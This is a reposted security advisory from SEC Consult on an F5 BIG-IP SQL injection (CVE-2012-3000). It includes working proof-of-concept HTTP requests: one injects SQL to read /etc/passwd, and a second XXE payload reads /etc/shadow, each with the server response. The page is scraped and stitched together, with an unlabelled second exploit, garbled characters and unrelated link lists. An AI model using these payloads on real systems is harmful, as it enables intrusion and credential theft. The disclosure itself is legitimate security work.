F5 BUGS
来源:互联网 发布:新版conoha windows 编辑:程序博客网 时间:2024/04/27 15:09
SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >
=======================================================================
title: SQL Injection
product: F5 BIG-IP
vulnerable version: <=11.2.0
fixed version: 11.2.0 HF3
11.2.1 HF3
CVE number: CVE-2012-3000
impact: Medium
homepage: http://www.f5.com/
found: 2012-09-03
by: S. Viehb枚ck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor/product description:
---------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility聴and ensures your applications
are fast, secure, and available."
URL: http://www.f5.com/products/big-ip/
Vulnerability overview/description:
-----------------------------------
A SQL injection vulnerability exists in a BIG-IP component. This enables an
authenticated attacker to access the MySQL database with the rights of MySQL
user "root" (= highest privileges).
Furthermore an attacker can access files in the file system with the rights of
the "mysql" OS user.
Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file system:
POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119
{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) --
x" }
Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.
A request to /sam/admin/reports/php/getSettings.php returns the data:
HTTP/1.1 200 OK
...
{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.
Successful exploitation was possible with Application Security (ASM) or Access
Policy (APM) enabled.
Vendor contact timeline:
------------------------
2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and
11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to 11.2.0 HF3 or 11.2.1 HF3.
Workaround:
-----------
No workaround available.
-----------------
The following exploit shows how files can be extracted from the file system:
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143
<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
The response includes the content of the file:
<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
...
- F5 BUGS
- BUGS
- bugs
- F5
- f5
- F5
- Bugs Bugs
- enter || f5 || ctrl+f5
- 小BUGS
- geos bugs
- Fix bugs
- waitj bugs
- VS2003 bugs
- php bugs
- fix bugs
- About bugs
- resin bugs
- Find bugs
- SQL全局变量
- CVTRES : fatal error CVT1100: duplicate resource. type:BITMAP
- VC++对存储过程的访问
- 器普计算机语言--进入全民编程
- Codeforces 189A
- F5 BUGS
- Python 实现的"冒泡排序"
- java中常见的枚举用法
- 建造者模式
- SQL系统存储过程
- vc6控制台程序利用SoapToolkit3.0调用WebService
- DM36X RTC Specification
- artDialog( http://www.planeart.cn/demo/artDialog/_doc/API.html)
- 判断当前是否处于Laucher主页面